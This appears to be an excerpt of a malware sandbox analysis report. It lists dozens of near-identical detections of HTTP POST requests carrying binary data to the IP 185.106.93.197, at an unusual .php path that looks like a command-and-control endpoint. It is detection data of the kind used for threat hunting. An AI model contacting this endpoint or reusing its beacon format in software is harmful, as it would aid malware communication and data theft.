Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1820Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1832Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2500Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1820Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1820Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
